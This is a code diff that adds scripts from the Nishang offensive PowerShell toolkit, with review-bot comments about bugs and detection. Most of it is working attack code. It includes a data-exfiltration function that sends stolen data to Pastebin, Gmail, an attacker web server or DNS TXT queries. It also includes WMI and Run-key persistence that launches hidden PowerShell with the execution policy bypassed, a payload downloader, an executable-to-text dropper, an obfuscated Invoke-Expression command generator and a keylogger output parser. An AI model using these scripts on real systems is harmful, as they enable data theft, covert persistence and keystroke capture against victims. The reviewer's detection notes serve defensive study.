$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $Data)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
'@
$ScriptContent = Get-Content $ScriptPath
Out-File -InputObject $ScriptContent -FilePath "$Filepath"
Out-File -InputObject $Exfiltration -Append -FilePath "$Filepath"
}
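Review bot: the `$Exfiltration` here-string is a verbatim copy of the Do-Exfiltration function added elsewhere in this commit, so every defect has to be fixed in two places; append the file's contents at run time, or keep a single source. The copy carries the same problems: `$smtpserver = smtp.gmail.com` and `$msg.From = $username@gmail.com` are not quoted strings, so the gmail branch cannot run as written, and `$Data` is declared with `ValueFromPipeLine = $True` but the function has no `Process` block, so `Get-Information | Do-Exfiltration` binds only the last object in the pipeline. Help text: "exfitration", "varios" and "Do-Exfiltraion.ps1" are misspelt.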

@ -0,0 +1,62 @@
<#
.SYNOPSIS
Nishang script which could be used to add reboot persistence to a powershell script.
.DESCRIPTION
This script accepts path of a script to which reboot persistence is to be added.
The target sript is dropped into the user's temp directory and either WMI permanent event consumer or Registry changes is used (based on privs) for persistence.
Persistence created using this script could be cleaned by using the Remove-Persistence.ps1 script in Nishang.
.PARAMETER ScriptPath
Path of the script to which persistence is to be added.
.Example
PS > Add-Persistence -ScriptPath C:\script.ps1
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
function Add-Persistence
{
[CmdletBinding()] Param(
[Parameter(Mandatory = $True)]
[String]
$ScriptPath
)
$body = Get-Content $ScriptPath
$modulename = $script:MyInvocation.MyCommand.Name
$name = "persist.vbs"
Out-File -InputObject $body -Force $env:TEMP\$modulename
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
{
$scriptpath = $env:TEMP
$scriptFileName = "$scriptpath\$name"
$filterNS = "root\cimv2"
$wmiNS = "root\subscription"
$query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
$filterName = "WindowsSanity"
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
}
else
{
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
}
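Review bot: `$scriptpath = $env:TEMP` in the administrator branch silently overwrites the `$ScriptPath` parameter (variable names are case-insensitive), and the two `echo ... > $env:TEMP\$name` lines in the `else` branch repeat the identical writes already performed above the `if`, so the VBS launcher is written twice; use a differently named local and drop the duplicate lines. `$modulename = $script:MyInvocation.MyCommand.Name` names the dropped copy after whatever invoked this script rather than after `$ScriptPath`, so the resulting file name depends on how Add-Persistence was loaded. The hard-coded artifacts deserve a line in `.DESCRIPTION`, since Remove-Persistence keys on them and defenders can as well: an `__EventFilter` and an `ActiveScriptEventConsumer` both named `WindowsSanity` in `root\subscription`, `persist.vbs` in `%TEMP%`, and an `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` value named `Update`. Typo: "sript".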

@ -0,0 +1,57 @@
<#
.SYNOPSIS
Nishang script which decodes a base64 string to readable.
.DESCRIPTION
This payload decodes a base64 string to readable.
.PARAMETER Base64Strfile
The filename which contains base64 string to be decoded. Default is "decoded.txt" in the current working directory.
Use the parameter -IsString while using a string instead of file.
.EXAMPLE
PS > Base64ToString base64.txt
.EXAMPLE
PS > Base64ToString dGVzdGVzdA== -IsString
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Base64ToString
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Base64Strfile,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$outputfile=".\base64decoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$base64string = [System.Convert]::FromBase64String($Base64Strfile)
}
else
{
$base64string = [System.Convert]::FromBase64String((Get-Content $Base64Strfile))
}
$decodedstring = [System.Text.Encoding]::Unicode.GetString($base64string)
$decodedstring
Out-File -InputObject $decodedstring -Encoding ascii -FilePath "$outputfile"
Write-Output "Decoded data written to file $outputfile"
}
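Review bot: the `.PARAMETER Base64Strfile` text claims a default of "decoded.txt", but that parameter is mandatory; the default actually belongs to `$outputfile` (`.\base64decoded.txt`), which has no `.PARAMETER` entry. The decoder uses `[System.Text.Encoding]::Unicode` (UTF-16LE), which matches StringToBase64 in this commit, but the `.EXAMPLE` input `dGVzdGVzdA==` is the UTF-8 encoding of "testest" and will not decode cleanly; use a UTF-16 sample or state that only StringToBase64 output is expected. `$base64string` holds the decoded bytes rather than base64, and `(Get-Content $Base64Strfile)` yields one string per line, which `FromBase64String` rejects for a multi-line file; read with `-Raw` or join the lines first.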

@ -0,0 +1,172 @@
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
Use above command for data exfiltration to gmail
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
Use above command for data exfiltration to a webserver which logs POST requests.
.EXAMPLE
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
Use above command for data exfiltration to a DNS server which logs TXT queries.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Do-Exfiltration
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$dev_key,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$username,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$password,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$URL,
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DomainName,
[Parameter(Position = 7, Mandatory = $False)]
[String]
$AuthNS
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:session_key=$http_request.responseText
}
function Compress-Encode
{
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
$encdata = [string]::Join("`n", $Data)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($encdata)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
$Compressed
}
if ($exfiloption -eq "pastebin")
{
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
$pastename = "Exfiltrated Data"
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = "Exfiltrated Data"
$msg.Body = $Data
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
}
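Review bot: the gmail branch cannot run as written: `$smtpserver = smtp.gmail.com` is parsed as a command invocation rather than a string, and `$msg.From = $username@gmail.com` / `$msg.To.Add($username@gmail.com)` are not quoted either; use `"smtp.gmail.com"` and `"$username@gmail.com"`. `$filename` in `if ($filename)` is never declared, so the attachment code is dead. `$Data` is bound from the pipeline but there is no `Process` block, so only the last piped object is handled. In the DNS branch `$lengthofsubstr` is never initialised (it relies on `$null` coercing to 0), and the `Invoke-Expression "nslookup ..."` wrappers can be direct `nslookup -querytype=txt "$querystring.$DomainName" $AuthNS` calls. Worth noting for anyone writing detections against this script: every 63-character chunk spawns a separate nslookup.exe with `-querytype=txt`, and the webserver branch posts the GZip+Base64 blob as the raw body under `application/x-www-form-urlencoded`, both of which stand out in process-creation and proxy logs.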

@ -0,0 +1,36 @@
<#
.SYNOPSIS
Nishang Payload to download a file in current users temp directory.
.DESCRIPTION
This payload downloads a file to the given location.
.PARAMETER URL
The URL from where the file would be downloaded.
.PARAMETER FileName
Name of the file where download would be saved.
.EXAMPLE
PS > Download http://example.com/file.txt newfile.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Download
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$URL,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$FileName
)
$webclient = New-Object System.Net.WebClient
$file = "$env:temp\$FileName"
$webclient.DownloadFile($URL,"$file")
}
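Review bot: `.DESCRIPTION` says the file is downloaded "to the given location" and `.PARAMETER FileName` calls it a path-like name, but the code always writes to `"$env:temp\$FileName"`; align the help with the code, and build the target with `Join-Path $env:TEMP $FileName` so a `FileName` containing separators is handled explicitly rather than by string concatenation. `DownloadFile` throws on any transport or HTTP error and nothing here catches it, and the function emits nothing on success; returning the final path would let callers verify where the file landed.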

@ -0,0 +1,37 @@
<#
.SYNOPSIS
Nishang script to convert an executable to text file.
.DESCRIPTION
This script converts and an executable to a text file.
.PARAMETER EXE
The path of the executable to be converted.
.PARAMETER FileName
Path of the text file to which executable will be converted.
.EXAMPLE
PS > ExetoText evil.exe evil.txt
.LINK
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
https://github.com/samratashok/nishang
#>
function ExetoText
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$EXE,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Filename
)
[byte[]] $hexdump = get-content -encoding byte -path "$EXE"
[System.IO.File]::WriteAllLines($Filename, ([string]$hexdump))
Write-Output "Converted file written to $Filename"
}
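Review bot: `get-content -encoding byte` followed by the `[string]$hexdump` cast writes one space-separated line of decimal byte values, not hex, so the `$hexdump` name and the "converted" wording are misleading; also `-Encoding Byte` exists only in Windows PowerShell (PowerShell 6 and later use `-AsByteStream`), which `.DESCRIPTION` should mention. `[System.IO.File]::WriteAllLines($Filename, ...)` resolves a relative `$Filename` against the process working directory, which is not necessarily `$PWD`, so `evil.txt` from the `.EXAMPLE` may land in an unexpected directory; resolve the path first or use `Out-File`. Typo in `.DESCRIPTION`: "converts and an executable".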

@ -0,0 +1,72 @@
<#
.SYNOPSIS
Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.
.DESCRIPTION
The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory.
Both the encoding and decoding is based on the code by ikarstein.
.PARAMETER EncodedData
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "decoded.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > Invoke-Decode -EncodedData C:\files\encoded.txt
.EXAMPLE
PS > Invoke-Decode K07MLUosSSzOyM+OycvMzsjM4eUCAA== -IsString
Use above to decode a string.
.LINK
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
https://github.com/samratashok/nishang
#>
function Invoke-Decode
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$EncodedData,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = ".\decoded.txt",
[Switch]
$IsString
)
if($IsString -eq $true)
{
$data = $EncodedData
}
else
{
$data = Get-Content $EncodedData -Encoding UTF8
}
$dec = [System.Convert]::FromBase64String($data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($dec, 0, $dec.Length)
$ms.Seek(0,0) | Out-Null
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
$sr = New-Object System.IO.StreamReader($cs)
$output = $sr.readtoend()
$output
Out-File -InputObject $output -FilePath $OutputFilePath
Write-Host "Decode data written to $OutputFilePath"
}
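Review bot: `Get-Content $EncodedData -Encoding UTF8` returns one string per line and `[System.Convert]::FromBase64String($data)` only accepts that when the file is a single line; Invoke-Encode writes it that way, but any wrapped or multi-line input fails with a conversion error, so join the lines or read with `-Raw`. The `MemoryStream`, `GZipStream` and `StreamReader` are never closed or disposed. `Write-Host "Decode data written to ..."` (should read "Decoded") bypasses the pipeline while the sibling Invoke-Encode uses `Write-Output`; pick one. Help typo: "ins place".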

@ -0,0 +1,110 @@
<#
.SYNOPSIS
Script for Nishang to encode and compress plain data.
.DESCRIPTION
The script asks for a path to a plain file, encodes it and writes to a file "encoded.txt" in the current working directory.
If the switch OutCommand is used. An encoded command which could be executed on a powershell console is also generated.
The encoded command is useful in case of non-interactive shells like webshell or when special characters in scripts may
create problems, for example, a meterpreter session.
.PARAMETER DataToEncode
The path of the file to be decoded. Use with -IsString to enter a string.
.PARAMETER OutputFilePath
The path of the output file. Default is "encoded.txt" in the current working directory.
.PARAMETER OutputCommandFilePath
The path of the output file where encoded command would be written. Default is "encodedcommand.txt" in the current working directory.
.PARAMETER IsString
Use this to specify if you are passing a string ins place of a filepath.
.EXAMPLE
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt -OutCommand
Use above command to generate encoded data and encoded command which could be used on powershell console.
.EXAMPLE
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt
.EXAMPLE
PS > Invoke-Encode Get-Process -IsString
Use above to decode a string.
.LINK
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
https://github.com/samratashok/nishang
#>
function Invoke-Encode
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$DataToEncode,
[Parameter(Position = 1, Mandatory = $False)]
[String]
$OutputFilePath = ".\encoded.txt",
[Parameter(Position = 2, Mandatory = $False)]
[String]
$OutputCommandFilePath = ".\encodedcommand.txt",
[Switch]
$OutCommand,
[Switch]
$IsString
)
if($IsString -eq $true)
{
$Enc = $DataToEncode
}
else
{
$Enc = Get-Content $DataToEncode -Encoding UTF8
}
$data = [string]::Join("`n", $Enc)
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
$sw = New-Object System.IO.StreamWriter($cs)
$sw.Write($data)
$sw.Close();
$Compressed = [Convert]::ToBase64String($ms.ToArray())
Write-Verbose $Compressed
Out-File -InputObject $Compressed -FilePath $OutputFilePath
Write-Output "Encoded data written to $OutputFilePath"
if ($OutCommand -eq $True)
{
#http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
"`$(New-Object IO.Compression.GZipStream (" +
"`$(New-Object IO.MemoryStream (,"+
"`$([Convert]::FromBase64String('$Compressed')))), " +
"[IO.Compression.CompressionMode]::Decompress)),"+
" [Text.Encoding]::ASCII)).ReadToEnd();"
Write-Verbose $command
Out-File -InputObject $command -FilePath $OutputCommandFilePath
Write-Output "Encoded command written to $OutputCommandFilePath"
}
}
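Review bot: the generated one-liner decodes with `[Text.Encoding]::ASCII` (last fragment of `$command`) while the compressor's `StreamWriter` wrote UTF-8, so any non-ASCII character in the input script becomes `?` when the command runs; use `[Text.Encoding]::UTF8` there. `.PARAMETER DataToEncode` says "file to be decoded" and the third `.EXAMPLE` says "Use above to decode a string", both copied from Invoke-Decode. `.DESCRIPTION` should also be clear that the encoded command only sidesteps special-character handling, not inspection: the `Invoke-Expression ... ReadToEnd()` wrapper is itself a recognisable pattern, and script block logging records the decompressed script once it executes.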

@ -0,0 +1,197 @@
<#
.SYNOPSIS
A script which could be used to parse keys logged
by Kelogger payload of Nishang.
.DESCRIPTION
This script parses keys logged by Keylogger payload
of Nishang.
.PARAMETER RawKeys
Name of the text file which contains logged keys.
.PARAMETER LoggedKeys
Name of the text file where parsed keys will be stored
.EXAMPLE
PS > Parse_Keys raw.txt logged.txt
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Parse_Keys
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$RawKeys,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$LoggedKeys
)
[String]$data = Get-Content $RawKeys
$keys = $data.split(" ");
foreach ($i in $keys)
{
switch ($i)
{
48 {$out = $out + "0"}
49 {$out = $out + "1"}
50 {$out = $out + "2"}
51 {$out = $out + "3"}
52 {$out = $out + "4"}
53 {$out = $out + "5"}
54 {$out = $out + "6"}
55 {$out = $out + "7"}
56 {$out = $out + "8"}
57 {$out = $out + "9"}
S-48 {$out = $out + ")"}
S-49 {$out = $out + "!"}
S-50 {$out = $out + "@"}
S-51 {$out = $out + "#"}
S-52 {$out = $out + "$"}
S-53 {$out = $out + "%"}
S-54 {$out = $out + "^"}
S-55 {$out = $out + "&"}
S-56 {$out = $out + "*"}
S-57 {$out = $out + "("}
65 {$out = $out + "A"}
66 {$out = $out + "B"}
67 {$out = $out + "C"}
68 {$out = $out + "D"}
69 {$out = $out + "E"}
70 {$out = $out + "F"}
71 {$out = $out + "G"}
72 {$out = $out + "H"}
73 {$out = $out + "I"}
74 {$out = $out + "J"}
75 {$out = $out + "K"}
76 {$out = $out + "L"}
77 {$out = $out + "M"}
78 {$out = $out + "N"}
79 {$out = $out + "O"}
80 {$out = $out + "P"}
81 {$out = $out + "Q"}
82 {$out = $out + "R"}
83 {$out = $out + "S"}
84 {$out = $out + "T"}
85 {$out = $out + "U"}
86 {$out = $out + "V"}
87 {$out = $out + "W"}
88 {$out = $out + "X"}
89 {$out = $out + "Y"}
90 {$out = $out + "Z"}
S-65 {$out = $out + "a"}
S-66 {$out = $out + "b"}
S-67 {$out = $out + "c"}
S-68 {$out = $out + "d"}
S-69 {$out = $out + "e"}
S-70 {$out = $out + "f"}
S-71 {$out = $out + "g"}
S-72 {$out = $out + "h"}
S-73 {$out = $out + "i"}
S-74 {$out = $out + "j"}
S-75 {$out = $out + "k"}
S-76 {$out = $out + "l"}
S-77 {$out = $out + "m"}
S-78 {$out = $out + "n"}
S-79 {$out = $out + "o"}
S-80 {$out = $out + "p"}
S-81 {$out = $out + "q"}
S-82 {$out = $out + "r"}
S-83 {$out = $out + "s"}
S-84 {$out = $out + "t"}
S-85 {$out = $out + "u"}
S-86 {$out = $out + "v"}
S-87 {$out = $out + "w"}
S-88 {$out = $out + "x"}
S-89 {$out = $out + "y"}
S-90 {$out = $out + "z"}
96 {$out = $out + "0"}
97 {$out = $out + "1"}
98 {$out = $out + "2"}
99 {$out = $out + "3"}
100 {$out = $out + "4"}
101 {$out = $out + "5"}
102 {$out = $out + "6"}
103 {$out = $out + "7"}
104 {$out = $out + "8"}
105 {$out = $out + "9"}
186 {$out = $out + ";"}
187 {$out = $out + "="}
188 {$out = $out + ","}
189 {$out = $out + "-"}
190 {$out = $out + "."}
191 {$out = $out + "/"}
192 {$out = $out + "``"}
S-186 {$out = $out + ":"}
S-187 {$out = $out + "+"}
S-188 {$out = $out + "<"}
S-189 {$out = $out + "_ "}
S-190 {$out = $out + ">"}
S-191 {$out = $out + "?"}
S-192 {$out = $out + "~"}
#1 {$out = $out + "Left Mouse Click"}
#2 {$out = $out + "Right Mouse Click"}
#4 {$out = $out + "Third Mouse Click"}
#9 {$out = $out + "Tab"}
#164 {$out = $out + "Left Alt"}
#165 {$out = $out + "Right Alt"}
#162 {$out = $out + "Left Ctrl"}
#163 {$out = $out + "Right Ctrl"}
#33 {$out = $out + "Page Up"}
#34 {$out = $out + "Page Down"}
#35 {$out = $out + "Home"}
#36 {$out = $out + "End"}
#37 {$out = $out + "Left Arrow"}
#38 {$out = $out + "Up Arrow"}
#39 {$out = $out + "Right Arrow"}
#40 {$out = $out + "Down Arrow"}
#37 {$out = $out + "Left Arrow"}
#38 {$out = $out + "Up Arrow"}
#39 {$out = $out + "Right Arrow"}
#44 {$out = $out + "Print Screen"}
#45 {$out = $out + "Insert"}
46 {$out = $out + "Delete"}
8 {$out = $out + "Backspace"}
32 {$out = $out + " "}
13 {$out = $out + "Enter"}
#19 {$out = $out + "Pause"}
#20 {$out = $out + "Caps Lock"}
#144 {$out = $out + "Num Lock"}
#145 {$out = $out + "Scroll Lock"}
#27 {$out = $out + "Escape"}
#91 {$out = $out + "Window Key"}
#111 {$out = $out + "/"}
#106 {$out = $out + "*"}
#107 {$out = $out + "+"}
#112 {$out = $out + "F1"}
#113 {$out = $out + "F2"}
#114 {$out = $out + "F3"}
#115 {$out = $out + "F4"}
#116 {$out = $out + "F5"}
#117 {$out = $out + "F6"}
#118 {$out = $out + "F7"}
#119 {$out = $out + "F8"}
#120 {$out = $out + "F9"}
#121 {$out = $out + "F10"}
#122 {$out = $out + "F11"}
#123 {$out = $out + "F12"}
}
}
Out-File -FilePath $LoggedKeys -Append -InputObject "$out"
}
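Review bot: the `switch` maps `65`..`90` to uppercase and `S-65`..`S-90` to lowercase while `S-48`..`S-57` map to the shifted symbols; if the `S-` prefix marks a held Shift key the letter cases are inverted, and if it means something else the help must say so, because nothing in `.DESCRIPTION` defines the input format. `S-189 {$out = $out + "_ "}` appends a trailing space that no other entry has. Non-printing keys are appended as the literal words "Backspace", "Delete" and "Enter", so the parsed output cannot distinguish a typed word "Enter" from the key; bracket them (`[Enter]`) or omit them. `$out` is never initialised and the result is written with `-Append`, so repeated runs accumulate in `$LoggedKeys`. The commented-out block lists cases 37, 38 and 39 twice. Typo in `.SYNOPSIS`: "Kelogger".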

@ -0,0 +1,72 @@
<#
.SYNOPSIS
Nishang script which could be used to clear the persistence added by Nishang payloads and scripts.
.DESCRIPTION
This script cleans WMI events and Registry keys added by various payloads and Add-persistence script.
Run the script as an Administrator to remove the WMI events.
.Example
PS > Remove-Persistence
Check for Persistence.
.Example
PS > Remove-Persistence -Remove
Remove the Persistence.
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
function Remove-Persistence
{
[CmdletBinding()] Param(
[Parameter(Position = 0)]
[Switch]
$Remove
)
if ($Remove -eq $true)
{
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
{
Write-Warning "Run the Command as an Administrator. Removing Registry keys only."
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
Break
}
Write-Output "Removing the WMI Events."
$filterName = "WindowsSanity"
gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"| Remove-WmiObject
gwmi activeScriptEventConsumer -Namespace root\subscription | Remove-WmiObject
gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'""" | Remove-WmiObject
Write-Output "Removing the Registry keys."
Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
}
$Regkey = Get-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -name Update -ErrorAction SilentlyContinue
$wmi_1 = gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"
$wmi_2 = gwmi activeScriptEventConsumer -Namespace root\subscription
$wmi_3 = gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'"""
if ($Regkey -ne $null )
{
Write-Warning "Run Registry key persistence found. Use with -Remove option to clean."
}
elseif (($wmi_1) -and ($wmi_2) -and ($wmi_3) -ne $null)
{
Write-Warning "WMI permanent event consumer persistence found. Use with -Remove option to clean."
}
else
{
Write-Output "No Persistence found."
}
}
